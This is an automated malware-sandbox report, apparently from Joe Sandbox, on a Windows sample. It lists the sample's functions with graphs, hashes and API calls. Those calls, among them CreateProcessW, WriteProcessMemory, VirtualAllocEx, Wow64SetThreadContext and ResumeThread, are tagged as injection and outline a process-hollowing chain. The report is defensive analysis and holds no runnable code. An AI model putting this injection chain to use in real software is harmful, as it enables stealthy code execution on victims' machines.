                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 269 1d88b6-1d894b 270 1d894d-1d895f 269->270 271 1d8962-1d8970 269->271 270->271 272 1d8987-1d89c3 271->272 273 1d8972-1d8984 271->273 274 1d89c5-1d89d4 272->274 275 1d89d7-1d8ab2 CreateProcessW 272->275 273->272 274->275 279 1d8abb-1d8b84 275->279 280 1d8ab4-1d8aba 275->280 289 1d8bba-1d8bc5 279->289 290 1d8b86-1d8baf 279->290 280->279 294 1d8bc6 289->294 290->289 294->294
                                                          APIs
                                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D8A9F
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 00669960eb7b17c044060c8f0d1940a4e147bc75231cde67deefa9d1a7ff546f
                                                          • Instruction ID: ef461b0968e83b454634a506c63f83e32e1e503be399ce821fb7fffae71815cd
                                                          • Opcode Fuzzy Hash: 00669960eb7b17c044060c8f0d1940a4e147bc75231cde67deefa9d1a7ff546f
                                                          • Instruction Fuzzy Hash: E581EFB4D002299FDF25CFA4C844BEDBBB1AB49304F0490AAE548B7260DB709E85CF94
                                                          Function 001D88C0 Relevance: 1.7, APIs: 1, Instructions: 236processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 295 1d88c0-1d894b 296 1d894d-1d895f 295->296 297 1d8962-1d8970 295->297 296->297 298 1d8987-1d89c3 297->298 299 1d8972-1d8984 297->299 300 1d89c5-1d89d4 298->300 301 1d89d7-1d8ab2 CreateProcessW 298->301 299->298 300->301 305 1d8abb-1d8b84 301->305 306 1d8ab4-1d8aba 301->306 315 1d8bba-1d8bc5 305->315 316 1d8b86-1d8baf 305->316 306->305 320 1d8bc6 315->320 316->315 320->320
                                                          APIs
                                                          • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D8A9F
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: f2ac16901efc5e1c04db4e4f6800c12eab38ccc3717885730b9832261dbca927
                                                          • Instruction ID: 341a2d455a7d5f259d0012dc06f98825cffd0f0dca683fc2ba004a70de68214f
                                                          • Opcode Fuzzy Hash: f2ac16901efc5e1c04db4e4f6800c12eab38ccc3717885730b9832261dbca927
                                                          • Instruction Fuzzy Hash: 7081D0B4D002299FDF25CF64C844BEDBBB1AF49304F0490AAE548B7250DB709E85DF94
                                                          Function 001D8F69 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 384 1d8f69-1d8fd7 386 1d8fee-1d904e WriteProcessMemory 384->386 387 1d8fd9-1d8feb 384->387 388 1d9057-1d9095 386->388 389 1d9050-1d9056 386->389 387->386 389->388
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D903E
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 6c6c457f3932d65c57ccb6a0330550df1510a7d6ef5219ee7bd12b1771f2b143
                                                          • Instruction ID: 2a7fc0585265fce0fe28dffa4e389de19a863b9be55a17275063f81fa8c0f9e9
                                                          • Opcode Fuzzy Hash: 6c6c457f3932d65c57ccb6a0330550df1510a7d6ef5219ee7bd12b1771f2b143
                                                          • Instruction Fuzzy Hash: 0F4197B5D042589FCF10CFA9D984ADEFBF1BB59314F24902AE818BB310D335AA45CB64
                                                          Function 001D8F70 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 392 1d8f70-1d8fd7 393 1d8fee-1d904e WriteProcessMemory 392->393 394 1d8fd9-1d8feb 392->394 395 1d9057-1d9095 393->395 396 1d9050-1d9056 393->396 394->393 396->395
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D903E
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: f90023dba30a110accbc0ac0185dcde149972160e225ee897faf1486d12ac91f
                                                          • Instruction ID: 66b504adda7331b0550dbce2e24b5bf480d1fec021d7b57cd211802b6b618e67
                                                          • Opcode Fuzzy Hash: f90023dba30a110accbc0ac0185dcde149972160e225ee897faf1486d12ac91f
                                                          • Instruction Fuzzy Hash: 4B4167B5D002589FCB10CFA9D984ADEFBF5BB59310F24902AE818B7350D375AA45CB64
                                                          Function 001D8D48 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 399 1d8d48-1d8e0d ReadProcessMemory 400 1d8e0f-1d8e15 399->400 401 1d8e16-1d8e54 399->401 400->401
                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D8DFD
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: e418b11be178d0f894d7373d3e6a3f998b1617d36727bf16a15701d8472cd4a2
                                                          • Instruction ID: 39559b78d89e8fc2d13326d8eaa43acc52a48f8d3fa1ff58f27bd08d041e3ac7
                                                          • Opcode Fuzzy Hash: e418b11be178d0f894d7373d3e6a3f998b1617d36727bf16a15701d8472cd4a2
                                                          • Instruction Fuzzy Hash: 784188B9D052589FCF10CFA9D984ADEFBB1AB59310F20902AE814B7210D375AA45CF65
                                                          Function 001D8D50 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 404 1d8d50-1d8e0d ReadProcessMemory 405 1d8e0f-1d8e15 404->405 406 1d8e16-1d8e54 404->406 405->406
                                                          APIs
                                                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D8DFD
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 77c924a0d82b93b9738928787b1be1773cb036354d830ff4f344ce26d2bf0288
                                                          • Instruction ID: 8c7d7744ef11f5916e3f6d4fe9af3450313a908803bc8cf4ac868326a6bde4cc
                                                          • Opcode Fuzzy Hash: 77c924a0d82b93b9738928787b1be1773cb036354d830ff4f344ce26d2bf0288
                                                          • Instruction Fuzzy Hash: 3E3167B9D042589FCF10CFAAD984ADEFBB1BB19310F20902AE814B7310D375AA55CF65
                                                          Function 001D8E61 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 409 1d8e61-1d8f1d VirtualAllocEx 410 1d8f1f-1d8f25 409->410 411 1d8f26-1d8f5c 409->411 410->411
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001D8F0D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: e91175bcd34c1bb21d0c2a71ddfb7d972ce3ceb4db6ec6fccccf4d9d260dca76
                                                          • Instruction ID: 5c79b6564cd5dfcf5b3674eab8a60c402d786a912d65224fd0704026ca4b932d
                                                          • Opcode Fuzzy Hash: e91175bcd34c1bb21d0c2a71ddfb7d972ce3ceb4db6ec6fccccf4d9d260dca76
                                                          • Instruction Fuzzy Hash: 103167B9D042589FCF10CFA9D984ADEFBB1AB59310F24901AE814BB310D375A946CF65
                                                          Function 001D8E68 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 414 1d8e68-1d8f1d VirtualAllocEx 415 1d8f1f-1d8f25 414->415 416 1d8f26-1d8f5c 414->416 415->416
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001D8F0D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: dc8269957d63284170b877411379c2e0295acdf47a80323cde30f9af8741a4d2
                                                          • Instruction ID: 5c68e1410beefe44c4ebab5c9e6826b3946f67f26bd12e8264412f5cc754b8b5
                                                          • Opcode Fuzzy Hash: dc8269957d63284170b877411379c2e0295acdf47a80323cde30f9af8741a4d2
                                                          • Instruction Fuzzy Hash: 6C3154B9D042589FCF10CFA9D984ADEFBB5AB59310F20A02AE818B7310D335A945CF65
                                                          Function 001D8C38 Relevance: 1.6, APIs: 1, Instructions: 92threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 419 1d8c38-1d8c9c 420 1d8c9e-1d8cb0 419->420 421 1d8cb3-1d8cfa Wow64SetThreadContext 419->421 420->421 422 1d8cfc-1d8d02 421->422 423 1d8d03-1d8d3b 421->423 422->423
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 001D8CEA
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: b8de46d34a93f21e97462ff5b79cfcf580ff821a4345953172543b72e508cad7
                                                          • Instruction ID: b26b357969767a32fd3b6eb6717fbc76180ef17e86d9c13162f122964b85f543
                                                          • Opcode Fuzzy Hash: b8de46d34a93f21e97462ff5b79cfcf580ff821a4345953172543b72e508cad7
                                                          • Instruction Fuzzy Hash: E631ABB5D052589FCB10CFA9D984AEEFBF1BB49314F24902AE414B7350D378AA45CF64
                                                          Function 001D8C40 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 426 1d8c40-1d8c9c 427 1d8c9e-1d8cb0 426->427 428 1d8cb3-1d8cfa Wow64SetThreadContext 426->428 427->428 429 1d8cfc-1d8d02 428->429 430 1d8d03-1d8d3b 428->430 429->430
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 001D8CEA
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: df8f6eda8c7450ff33a9d60c1e65406cf81b54c53ba7b8a9a0d298e4b1a11e5f
                                                          • Instruction ID: b13cab31e1db7d74a42602620d415c5abb2aa582febea635e85fef8d42726973
                                                          • Opcode Fuzzy Hash: df8f6eda8c7450ff33a9d60c1e65406cf81b54c53ba7b8a9a0d298e4b1a11e5f
                                                          • Instruction Fuzzy Hash: 6D3199B5D012589FCB10CFAAD984ADEFBF1BB49314F24902AE418B7350D778AA45CF64
                                                          Function 001D90A9 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 433 1d90a9-1d9136 ResumeThread 434 1d913f-1d916d 433->434 435 1d9138-1d913e 433->435 435->434
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 832988ee3f9222d1cde31959d20babf41eeaf04204e5f032ccc650607f5d8bbc
                                                          • Instruction ID: 56f5c57461eebaee57d6e974c992ef353593e6623dd22989c57c5e3433bba774
                                                          • Opcode Fuzzy Hash: 832988ee3f9222d1cde31959d20babf41eeaf04204e5f032ccc650607f5d8bbc
                                                          • Instruction Fuzzy Hash: 4521AAB5D002099FCF10CFA9D884ADEFBF0AB59320F24905AE818B7310D334A945CF65
                                                          Function 001D90B0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 438 1d90b0-1d9136 ResumeThread 439 1d913f-1d916d 438->439 440 1d9138-1d913e 438->440 440->439
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 1a7e3d63f0e52c1b70d5378f3da065079852074d210d55678a25eb869bd76cc0
                                                          • Instruction ID: a5a1b41f6fceb6eea68bbcd06860526c8045cea52d6b6018e6f75afc8aa00701
                                                          • Opcode Fuzzy Hash: 1a7e3d63f0e52c1b70d5378f3da065079852074d210d55678a25eb869bd76cc0
                                                          • Instruction Fuzzy Hash: 4F2188B9D002099FCB10CFA9D984ADEFBF4AB59320F24905AE818B7310D375A945CFA5
                                                          Function 00200430 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536819962.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_200000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a70c84b7b9d703253c673aee34ba86c5c7979580a7922c6c6f27936c3997b897
                                                          • Instruction ID: 70aef9ec352aef9dd93924e5e01912fe714e6842f456466e12239e1a99530dc2
                                                          • Opcode Fuzzy Hash: a70c84b7b9d703253c673aee34ba86c5c7979580a7922c6c6f27936c3997b897
                                                          • Instruction Fuzzy Hash: 7AF0A534900208EFCB44DFA8D544A9CBBF0FB48300F1081A9E91897361D7319A54DB45
                                                          Function 00200B68 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536819962.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_200000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c70bba20f9727bb5a980eeb540a6df23a063b4f1931dd81f94f46052ac195f7a
                                                          • Instruction ID: 701b51f64bffc0c501c6c3c563d49d2b1857b2d3e35da547eff7b70a01f328a1
                                                          • Opcode Fuzzy Hash: c70bba20f9727bb5a980eeb540a6df23a063b4f1931dd81f94f46052ac195f7a
                                                          • Instruction Fuzzy Hash: C5E01A74D00308EFCB04DFA8D444A9DBBB5EB48304F1081AAD804A3350D7359A90DF84
                                                          Function 00200A20 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536819962.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_200000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3dfcb137d8f40848a5b5b66bd36a47041193c22bd97c41934c4f9e4a60732a45
                                                          • Instruction ID: c74fdc3046449a3ed31eb07e618866e52591bc5bafc98b7400714e5b17152694
                                                          • Opcode Fuzzy Hash: 3dfcb137d8f40848a5b5b66bd36a47041193c22bd97c41934c4f9e4a60732a45
                                                          • Instruction Fuzzy Hash: 72E0B670E00308EFCB54EFA8E54569DBBF4EB48300F5081AAD818A3381D7355A90CF81
                                                          Function 00200238 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536819962.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_200000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f327dd8667f2eb28328b03cc3a0f41f88fd42486fb6609e503823f699c56d3f8
                                                          • Instruction ID: 2dce0a8029ddf32cb24892cc8b361d98ca4c518a18c5999e87d565a2cb233bf7
                                                          • Opcode Fuzzy Hash: f327dd8667f2eb28328b03cc3a0f41f88fd42486fb6609e503823f699c56d3f8
                                                          • Instruction Fuzzy Hash: 33E04630D04308EFCB14DFB8A4146ADBBF4AB84301F2082EAD818A3381D7399B90DB80
                                                          Function 00200580 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536819962.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_200000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00b589ec4863344c57956e26b078791a4bee63d233eb052a0cd63d793e379d64
                                                          • Instruction ID: 06a81eb952eb741b821984a3b24979d9eee1dd8e42e10faf3d97f2967edb9806
                                                          • Opcode Fuzzy Hash: 00b589ec4863344c57956e26b078791a4bee63d233eb052a0cd63d793e379d64
                                                          • Instruction Fuzzy Hash: 95E0B674910208DFC744DFA8E995A5CBFF4AB08701F5001A9D90897361E7319A90CB81
                                                          Function 002003E0 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536819962.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_200000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1203ff13faf4b5235b2c04cb03f886d41eeac42dd95b0d86ea0e3a127d9c6e25
                                                          • Instruction ID: 3877bcf1f1267ea08e3b95aa7a500247154b1690cc3bf819c77f95c058fc38a3
                                                          • Opcode Fuzzy Hash: 1203ff13faf4b5235b2c04cb03f886d41eeac42dd95b0d86ea0e3a127d9c6e25
                                                          • Instruction Fuzzy Hash: 59D01735900208EFC704EFA4E915BADB3F8EB45300F1144A8E408A3281DB326F649B95
                                                          Function 002009D0 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536819962.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_200000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de32e455337e58b5bda494853bbf3e003bd1d8b9339dd6cc016cb0c62a7151df
                                                          • Instruction ID: 192f5283bd953b1d0cdd9aa35e8a72ee2fed06225815eb347563ef8f6cc28802
                                                          • Opcode Fuzzy Hash: de32e455337e58b5bda494853bbf3e003bd1d8b9339dd6cc016cb0c62a7151df
                                                          • Instruction Fuzzy Hash: 53D01730A0020DEFDB08EFA5E911B5DB3B8AB84700F5000A9A809A3381DB325F5097A2

                                                          Non-executed Functions

                                                          Function 001D0A78 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p!p
                                                          • API String ID: 0-1147775804
                                                          • Opcode ID: 33d80f4307f36263e531a1ae3be8a432b115b78fddf180c57f34bad9dfecf644
                                                          • Instruction ID: be44dbb2877319679202fdb2f84d54a8edc1994993bef0ef14db28f13288f0fe
                                                          • Opcode Fuzzy Hash: 33d80f4307f36263e531a1ae3be8a432b115b78fddf180c57f34bad9dfecf644
                                                          • Instruction Fuzzy Hash: D232B075A00218DFDB15CFA4C984E99BBB2FF49300F1581E9E509AB361DB31AE91DF50
                                                          Function 001D20F7 Relevance: .1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26e1d9f9437df230cc46f7dcc8c87e9c437c3a762edf5f477e65c46b4e3439b3
                                                          • Instruction ID: 4a0f40bef2c39e55326207591b7878b22042ea38935710bcbfc5fc2284b01403
                                                          • Opcode Fuzzy Hash: 26e1d9f9437df230cc46f7dcc8c87e9c437c3a762edf5f477e65c46b4e3439b3
                                                          • Instruction Fuzzy Hash: 5C51D675E052188FDB18CFAAD940ADDBBF2BF99300F14C1AAD409AB355EB305A45CF50
                                                          Function 001D0A6A Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.536803905.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_1d0000_temp_executable.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 463d0989ece169985ff5fd45262e6819b3464c3b8474d41a520e23feb14c0af7
                                                          • Instruction ID: aac930f0448a412461120e6956117d669268a0c815bd2761630481fcdf6f7a80
                                                          • Opcode Fuzzy Hash: 463d0989ece169985ff5fd45262e6819b3464c3b8474d41a520e23feb14c0af7
                                                          • Instruction Fuzzy Hash: 7951B675E052189FDB18CFA6D940ADEBBF2BF89300F14D1AAD408AB264DB305A85CF11

                                                          Execution Graph

                                                          Execution Coverage:1.1%
                                                          Dynamic/Decrypted Code Coverage:4.4%
                                                          Signature Coverage:7%
                                                          Total number of Nodes:114
                                                          Total number of Limit Nodes:11
                                                          execution_graph 71929 424243 71930 42425f 71929->71930 71931 424287 71930->71931 71932 42429b 71930->71932 71933 42bda3 NtClose 71931->71933 71939 42bda3 71932->71939 71935 424290 71933->71935 71936 4242a4 71942 42def3 RtlAllocateHeap 71936->71942 71938 4242af 71940 42bdc0 71939->71940 71941 42bdce NtClose 71940->71941 71941->71936 71942->71938 72025 4245d3 72029 4245ec 72025->72029 72026 424637 72027 42ddd3 RtlFreeHeap 72026->72027 72028 424647 72027->72028 72029->72026 72030 424677 72029->72030 72032 42467c 72029->72032 72031 42ddd3 RtlFreeHeap 72030->72031 72031->72032 72033 42ef93 72034 42efa3 72033->72034 72035 42efa9 72033->72035 72038 42deb3 72035->72038 72037 42efcf 72041 42c0a3 72038->72041 72040 42dece 72040->72037 72042 42c0bd 72041->72042 72043 42c0cb RtlAllocateHeap 72042->72043 72043->72040 72044 42b413 72045 42b42d 72044->72045 72048 7bfdc0 LdrInitializeThunk 72045->72048 72046 42b452 72048->72046 71943 413583 71944 4135a3 71943->71944 71947 41360c 71944->71947 71948 41aca3 RtlFreeHeap LdrInitializeThunk 71944->71948 71946 413602 71948->71946 71949 4133a3 71952 42c013 71949->71952 71953 42c030 71952->71953 71956 7bfb68 LdrInitializeThunk 71953->71956 71954 4133c2 71956->71954 72049 41dd53 72050 41dd79 72049->72050 72054 41de70 72050->72054 72055 42f0c3 72050->72055 72052 41de11 72053 42b463 LdrInitializeThunk 72052->72053 72052->72054 72053->72054 72056 42f033 72055->72056 72057 42deb3 RtlAllocateHeap 72056->72057 72058 42f090 72056->72058 72059 42f06d 72057->72059 72058->72052 72060 42ddd3 RtlFreeHeap 72059->72060 72060->72058 72061 423d96 72062 423d9c 72061->72062 72063 423e23 72062->72063 72064 423e38 72062->72064 72065 42bda3 NtClose 72063->72065 72066 42bda3 NtClose 72064->72066 72067 423e2c 72065->72067 72069 423e41 72066->72069 72068 423e78 72069->72068 72070 42ddd3 RtlFreeHeap 72069->72070 72071 423e6c 72070->72071 71957 401ae8 71958 401afe 71957->71958 71961 42f463 71958->71961 71959 401b72 71959->71959 71964 42d993 71961->71964 71965 42d9b9 71964->71965 71974 407263 71965->71974 71967 42d9cf 71973 42da2b 71967->71973 71977 41a993 71967->71977 71969 42d9ee 71970 42c123 ExitProcess 71969->71970 71971 42da03 71969->71971 71970->71971 71988 42c123 71971->71988 71973->71959 71991 415d33 71974->71991 71976 407270 71976->71967 71978 41a9bf 71977->71978 72013 41a883 71978->72013 71981 41a9ec 71983 42bda3 NtClose 71981->71983 71985 41a9f7 71981->71985 71982 41aa20 71982->71969 71983->71985 71984 41aa04 71984->71982 71986 42bda3 NtClose 71984->71986 71985->71969 71987 41aa16 71986->71987 71987->71969 71989 42c140 71988->71989 71990 42c14e ExitProcess 71989->71990 71990->71973 71992 415d4d 71991->71992 71994 415d63 71992->71994 71995 42c7a3 71992->71995 71994->71976 71997 42c7bd 71995->71997 71996 42c7ec 71996->71994 71997->71996 72002 42b463 71997->72002 72003 42b47d 72002->72003 72009 7bfae8 LdrInitializeThunk 72003->72009 72004 42b4a6 72006 42ddd3 72004->72006 72010 42c0e3 72006->72010 72008 42c859 72008->71994 72009->72004 72011 42c0fd 72010->72011 72012 42c10b RtlFreeHeap 72011->72012 72012->72008 72014 41a89d 72013->72014 72018 41a979 72013->72018 72019 42b4f3 72014->72019 72017 42bda3 NtClose 72017->72018 72018->71981 72018->71984 72020 42b50d 72019->72020 72023 7c07ac LdrInitializeThunk 72020->72023 72021 41a96d 72021->72017 72023->72021 72024 7bf9f0 LdrInitializeThunk

                                                          Executed Functions

                                                          Function 0042BDA3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 34 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                          Memory Dump Source
